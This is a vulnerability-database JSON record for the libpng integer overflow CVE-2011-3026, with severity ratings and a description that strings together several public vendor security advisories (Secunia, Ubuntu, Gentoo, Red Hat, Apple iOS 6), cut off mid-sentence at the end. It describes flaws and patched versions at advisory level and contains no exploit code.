"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-3026",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-6277",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-59558",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-50971",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2011-3026",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation. Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers. These vulnerabilities could allow a remote attacker to execute arbitrary code on an affected system. libpng is prone to a remote integer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will likely crash the library. Micro Focus Autonomy KeyView IDOL is a library from Micro Focus UK that can decode more than 1000 different file formats. A security vulnerability exists in Micro Focus Autonomy KeyView IDOL versions prior to 10.16. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSymantec Products KeyView File Processing Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA51365\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/51365/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51365\n\nRELEASE DATE:\n2012-11-21\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/51365/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/51365/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51365\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nSymantec has acknowledged some vulnerabilities in multiple products,\nwhich can be exploited by malicious people to compromise a vulnerable\nsystem. \n\nFor more information:\nSA51362\n\nThe vulnerabilities are reported in the following products:\n* Symantec Mail Security for Microsoft Exchange (SMSMSE) versions\n6.5.x\n* Symantec Mail Security for Domino (SMSDOM) versions 8.1.x\n* Symantec Messaging Gateway (SMG) versions 9.5.x\n* Symantec Data Loss Prevention(DLP) Enforce/Detection Servers for\nWindows versions 11.x\n* Symantec Data Loss Prevention Enforce/Detection Servers for Linux\nversions 11.x\n* Symantec Data Loss Prevention Endpoint Agents versions 11.x\n\nSOLUTION:\nUpdate of upgrade to a fixed version. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nORIGINAL ADVISORY:\nSymantec:\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=\u0026suid=20121120_00\n\nUS-CERT:\nhttp://www.kb.cert.org/vuls/id/849841\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. ============================================================================\nUbuntu Security Notice USN-1367-2\nFebruary 17, 2012\n\nfirefox vulnerability\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.10\n- Ubuntu 10.04 LTS\n\nSummary:\n\nFirefox could be made to crash or run programs as your login if it opened a\nspecially crafted file. \n\nOriginal advisory details:\n \n Jueri Aedla discovered that libpng did not properly verify the size used\n when allocating memory during chunk decompression. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201206-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libpng: Multiple vulnerabilities\n Date: June 22, 2012\n Bugs: #373967, #386185, #401987, #404197, #410153\n ID: 201206-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities in libpng might allow remote attackers to\nexecute arbitrary code or cause a Denial of Service condition. It is used by several programs, including web\nbrowsers and potentially server processes. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/libpng \u003c 1.5.10 \u003e= 1.5.10\n *\u003e= 1.2.49\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libpng:\n\n* The \"embedded_profile_len()\" function in pngwutil.c does not check\n for negative values, resulting in a memory leak (CVE-2009-5063). \n* The \"png_format_buffer()\" function in pngerror.c contains an\n off-by-one error (CVE-2011-2501). \n* The \"png_rgb_to_gray()\" function in pngrtran.c contains an integer\n overflow error (CVE-2011-2690). \n* The \"png_err()\" function in pngerror.c contains a NULL pointer\n dereference error (CVE-2011-2691). \n* The \"png_handle_sCAL()\" function in pngrutil.c improperly handles\n malformed sCAL chunks(CVE-2011-2692). \n* The \"png_decompress_chunk()\" function in pngrutil.c contains an\n integer overflow error (CVE-2011-3026). \n* The \"png_inflate()\" function in pngrutil.c contains and out of bounds\n error (CVE-2011-3045). \n* The \"png_set_text_2()\" function in pngset.c contains an error which\n could result in memory corruption (CVE-2011-3048). \n* The \"png_formatted_warning()\" function in pngerror.c contains an\n off-by-one error (CVE-2011-3464). \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libpng 1.5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.5.10\"\n\nAll libpng 1.2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.2.49\"\n\nPackages which depend on this library may need to be recompiled. Tools\nsuch as revdep-rebuild may assist in identifying some of these\npackages. \n\nReferences\n==========\n\n[ 1 ] CVE-2009-5063\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5063\n[ 2 ] CVE-2011-2501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2501\n[ 3 ] CVE-2011-2690\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2690\n[ 4 ] CVE-2011-2691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2691\n[ 5 ] CVE-2011-2692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2692\n[ 6 ] CVE-2011-3026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026\n[ 7 ] CVE-2011-3045\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3045\n[ 8 ] CVE-2011-3048\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3048\n[ 9 ] CVE-2011-3464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3464\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201206-15.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Summary:\n\nUpdated seamonkey packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4. \n\nThe Red Hat Security Response Team has rated this update as having critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available from the CVE link in\nthe References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64\nRed Hat Enterprise Linux Desktop version 4 - i386, x86_64\nRed Hat Enterprise Linux ES version 4 - i386, ia64, x86_64\nRed Hat Enterprise Linux WS version 4 - i386, ia64, x86_64\n\n3. Description:\n\nSeaMonkey is an open source web browser, e-mail and newsgroup client, IRC\nchat client, and HTML editor. \n\nA heap-based buffer overflow flaw was found in the way SeaMonkey handled\nPNG (Portable Network Graphics) images. (CVE-2011-3026)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthis issue. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect. \n\n4. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n790737 - CVE-2011-3026 libpng: Heap-buffer-overflow in png_decompress_chunk\n\n6. Package List:\n\nRed Hat Enterprise Linux AS version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nia64:\nseamonkey-1.0.9-79.el4.ia64.rpm\nseamonkey-chat-1.0.9-79.el4.ia64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ia64.rpm\nseamonkey-devel-1.0.9-79.el4.ia64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ia64.rpm\nseamonkey-mail-1.0.9-79.el4.ia64.rpm\n\nppc:\nseamonkey-1.0.9-79.el4.ppc.rpm\nseamonkey-chat-1.0.9-79.el4.ppc.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ppc.rpm\nseamonkey-devel-1.0.9-79.el4.ppc.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ppc.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ppc.rpm\nseamonkey-mail-1.0.9-79.el4.ppc.rpm\n\ns390:\nseamonkey-1.0.9-79.el4.s390.rpm\nseamonkey-chat-1.0.9-79.el4.s390.rpm\nseamonkey-debuginfo-1.0.9-79.el4.s390.rpm\nseamonkey-devel-1.0.9-79.el4.s390.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.s390.rpm\nseamonkey-js-debugger-1.0.9-79.el4.s390.rpm\nseamonkey-mail-1.0.9-79.el4.s390.rpm\n\ns390x:\nseamonkey-1.0.9-79.el4.s390x.rpm\nseamonkey-chat-1.0.9-79.el4.s390x.rpm\nseamonkey-debuginfo-1.0.9-79.el4.s390x.rpm\nseamonkey-devel-1.0.9-79.el4.s390x.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.s390x.rpm\nseamonkey-js-debugger-1.0.9-79.el4.s390x.rpm\nseamonkey-mail-1.0.9-79.el4.s390x.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nRed Hat Enterprise Linux ES version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nia64:\nseamonkey-1.0.9-79.el4.ia64.rpm\nseamonkey-chat-1.0.9-79.el4.ia64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ia64.rpm\nseamonkey-devel-1.0.9-79.el4.ia64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ia64.rpm\nseamonkey-mail-1.0.9-79.el4.ia64.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nRed Hat Enterprise Linux WS version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nia64:\nseamonkey-1.0.9-79.el4.ia64.rpm\nseamonkey-chat-1.0.9-79.el4.ia64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ia64.rpm\nseamonkey-devel-1.0.9-79.el4.ia64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ia64.rpm\nseamonkey-mail-1.0.9-79.el4.ia64.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-3026.html\nhttps://access.redhat.com/security/updates/classification/#critical\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2012-09-19-1 iOS 6\n\niOS 6 is now available and addresses the following:\n\nCFNetwork\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to the\ndisclosure of sensitive information\nDescription: An issue existed in CFNetwork\u0027s handling of malformed\nURLs. CFNetwork may send requests to an incorrect hostname, resulting\nin the disclosure of sensitive information. This issue was addressed\nthrough improvements to URL handling. \nCVE-ID\nCVE-2012-3724 : Erling Ellingsen of Facebook\n\nCoreGraphics\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Multiple vulnerabilities in FreeType\nDescription: Multiple vulnerabilities existed in FreeType, the most\nserious of which may lead to arbitrary code execution when processing\na maliciously crafted font. These issues were addressed by updating\nFreeType to version 2.4.9. Further information is available via the\nFreeType site at http://www.freetype.org/\nCVE-ID\nCVE-2012-1126\nCVE-2012-1127\nCVE-2012-1128\nCVE-2012-1129\nCVE-2012-1130\nCVE-2012-1131\nCVE-2012-1132\nCVE-2012-1133\nCVE-2012-1134\nCVE-2012-1135\nCVE-2012-1136\nCVE-2012-1137\nCVE-2012-1138\nCVE-2012-1139\nCVE-2012-1140\nCVE-2012-1141\nCVE-2012-1142\nCVE-2012-1143\nCVE-2012-1144\n\nCoreMedia\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: An uninitialized memory access existed in the handling\nof Sorenson encoded movie files. This issue was addressed through\nimproved memory initialization. \nCVE-ID\nCVE-2012-3722 : Will Dormann of the CERT/CC\n\nDHCP\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A malicious Wi-Fi network may be able to determine networks\na device has previously accessed\nDescription: Upon connecting to a Wi-Fi network, iOS may broadcast\nMAC addresses of previously accessed networks per the DNAv4 protocol. \nThis issue was addressed by disabling DNAv4 on unencrypted Wi-Fi\nnetworks. \nCVE-ID\nCVE-2012-3725 : Mark Wuergler of Immunity, Inc. \n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted TIFF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A buffer overflow existed in libtiff\u0027s handling of\nThunderScan encoded TIFF images. This issue was addressed by updating\nlibtiff to version 3.9.5. \nCVE-ID\nCVE-2011-1167\n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted PNG image may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in libpng\u0027s\nhandling of PNG images. These issues were addressed through improved\nvalidation of PNG images. \nCVE-ID\nCVE-2011-3026 : Juri Aedla\nCVE-2011-3048\nCVE-2011-3328\n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted JPEG image may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A double free issue existed in ImageIO\u0027s handling of\nJPEG images. This issue was addressed through improved memory\nmanagement. \nCVE-ID\nCVE-2012-3726 : Phil of PKJE Consulting\n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted TIFF image may lead to an\nunexpected application termination or arbitrary code execution\nDescription: An integer overflow issue existed in libTIFF\u0027s handling\nof TIFF images. This issue was addressed through improved validation\nof TIFF images. \nCVE-ID\nCVE-2012-1173 : Alexander Gavrun working with HP\u0027s Zero Day\nInitiative\n\nInternational Components for Unicode\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Applications that use ICU may be vulnerable to an unexpected\napplication termination or arbitrary code execution\nDescription: A stack buffer overflow existed in the handling of ICU\nlocale IDs. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2011-4599\n\nIPSec\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Loading a maliciously crafted racoon configuration file may\nlead to arbitrary code execution\nDescription: A buffer overflow existed in the handling of racoon\nconfiguration files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2012-3727 : iOS Jailbreak Dream Team\n\nKernel\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: An invalid pointer dereference issue existed in the\nkernel\u0027s handling of packet filter ioctls. This may allow an attacker\nto alter kernel memory. This issue was addressed through improved\nerror handling. \nCVE-ID\nCVE-2012-3728 : iOS Jailbreak Dream Team\n\nKernel\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An uninitialized memory access issue existed in the\nBerkeley Packet Filter interpreter, which led to the disclosure of\nmemory content. This issue was addressed through improved memory\ninitialization. \nCVE-ID\nCVE-2012-3729 : Dan Rosenberg\n\nlibxml\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted web page may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple vulnerabilities existed in libxml, the most\nserious of which may lead to an unexpected application termination or\narbitrary code execution. These issues were addressed by applying the\nrelevant upstream patches. \nCVE-ID\nCVE-2011-1944 : Chris Evans of Google Chrome Security Team\nCVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of\nChinese Academy of Sciences\nCVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of\nChinese Academy of Sciences\nCVE-2011-3919 : Juri Aedla\n\nMail\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Mail may present the wrong attachment in a message\nDescription: A logic issue existed in Mail\u0027s handling of\nattachments. If a subsequent mail attachment used the same Content-ID\nas a previous one, the previous attachment would be displayed, even\nin the case where the 2 mails originated from different senders. This\ncould facilitate some spoofing or phishing attacks. This issue was\naddressed through improved handling of attachments. \nCVE-ID\nCVE-2012-3730 : Angelo Prado of the salesforce.com Product Security\nTeam\n\nMail\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Email attachments may be read without user\u0027s passcode\nDescription: A logic issue existed in Mail\u0027s use of Data Protection\non email attachments. This issue was addressed by properly setting\nthe Data Protection class for email attachments. \nCVE-ID\nCVE-2012-3731 : Stephen Prairie of Travelers Insurance, Erich\nStuntebeck of AirWatch\n\nMail\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An attacker may spoof the sender of a S/MIME signed message\nDescription: S/MIME signed messages displayed the untrusted \u0027From\u0027\naddress, instead of the name associated with the message signer\u0027s\nidentity. This issue was addressed by displaying the address\nassociated with the message signer\u0027s identity when it is available. \nCVE-ID\nCVE-2012-3732 : An anonymous researcher\n\nMessages\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A user may unintentionally disclose the existence of their\nemail addresses\nDescription: When a user had multiple email addresses associated\nwith iMessage, replying to a message may have resulted in the reply\nbeing sent from a different email address. This may disclose another\nemail address associated to the user\u0027s account. This issue was\naddressed by always replying from the email address the original\nmessage was sent to. \nCVE-ID\nCVE-2012-3733 : Rodney S. Foley of Gnomesoft, LLC\n\nOffice Viewer\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Unencrypted document data may be written to a temporary file\nDescription: An information disclosure issue existed in the support\nfor viewing Microsoft Office files. When viewing a document, the\nOffice Viewer would write a temporary file containing data from the\nviewed document to the temporary directory of the invoking process. \nFor an application that uses data protection or other encryption to\nprotect the user\u0027s files, this could lead to information\ndisclosure. This issue was addressed by avoiding creation of\ntemporary files when viewing Office documents. \nCVE-ID\nCVE-2012-3734 : Salvatore Cataudella of Open Systems Technologies\n\nOpenGL\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Applications that use OS X\u0027s OpenGL implementation may be\nvulnerable to an unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues existed in the\nhandling of GLSL compilation. These issues were addressed through\nimproved validation of GLSL shaders. \nCVE-ID\nCVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and\nMarc Schoenefeld of the Red Hat Security Response Team\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device could briefly\nview the last used third-party app on a locked device\nDescription: A logic issue existed with the display of the \"Slide to\nPower Off\" slider on the lock screen. This issue was addressed\nthrough improved lock state management. \nCVE-ID\nCVE-2012-3735 : Chris Lawrence DBB\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device may be able to\nbypass the screen lock\nDescription: A logic issue existed in the termination of FaceTime\ncalls from the lock screen. This issue was addressed through improved\nlock state management. \nCVE-ID\nCVE-2012-3736 : Ian Vitek of 2Secure AB\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: All photos may be accessible at the lock screen\nDescription: A design issue existed in the support for viewing\nphotos that were taken at the lock screen. In order to determine\nwhich photos to permit access to, the passcode lock consulted the\ntime at which the device was locked and compared it to the time that\na photo was taken. By spoofing the current time, an attacker could\ngain access to photos that were taken before the device was locked. \nThis issues was addressed by explicitly keeping track of the photos\nthat were taken while the device was locked. \nCVE-ID\nCVE-2012-3737 : Ade Barkah of BlueWax Inc. \n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to a locked device may perform\nFaceTime calls\nDescription: A logic issue existed in the Emergency Dialer screen,\nwhich permitted FaceTime calls via Voice Dialing on the locked\ndevice. This could also disclose the user\u0027s contacts via contact\nsuggestions. This issue was addressed by disabling Voice Dialing on\nthe Emergency Dialer screen. \nCVE-ID\nCVE-2012-3738 : Ade Barkah of BlueWax Inc. \n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device may be able to\nbypass the screen lock\nDescription: Using the camera from the screen lock could in some\ncases interfere with automatic lock functionality, allowing a person\nwith physical access to the device to bypass the Passcode Lock\nscreen. This issue was addressed through improved lock state\nmanagement. \nCVE-ID\nCVE-2012-3739 : Sebastian Spanninger of the Austrian Federal\nComputing Centre (BRZ)\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device may be able to\nbypass the screen lock\nDescription: A state management issue existed in the handling of the\nscreen lock. This issue was addressed through improved lock state\nmanagement. \nCVE-ID\nCVE-2012-3740 : Ian Vitek of 2Secure AB\n\nRestrictions\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A user may be able to make purchases without entering Apple\nID credentials\nDescription: After disabling Restrictions, iOS may not ask for the\nuser\u0027s password during a transaction. This issue was addressed by\nadditional enforcement of purchase authorization. \nCVE-ID\nCVE-2012-3741 : Kevin Makens of Redwood High School\n\nSafari\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Websites may use characters with an appearance similar to\nthe lock icon in their titles\nDescription: Websites could use a Unicode character to create a lock\nicon in the page title. This icon was similar in appearance to the\nicon used to indicate a secure connection, and could have lead 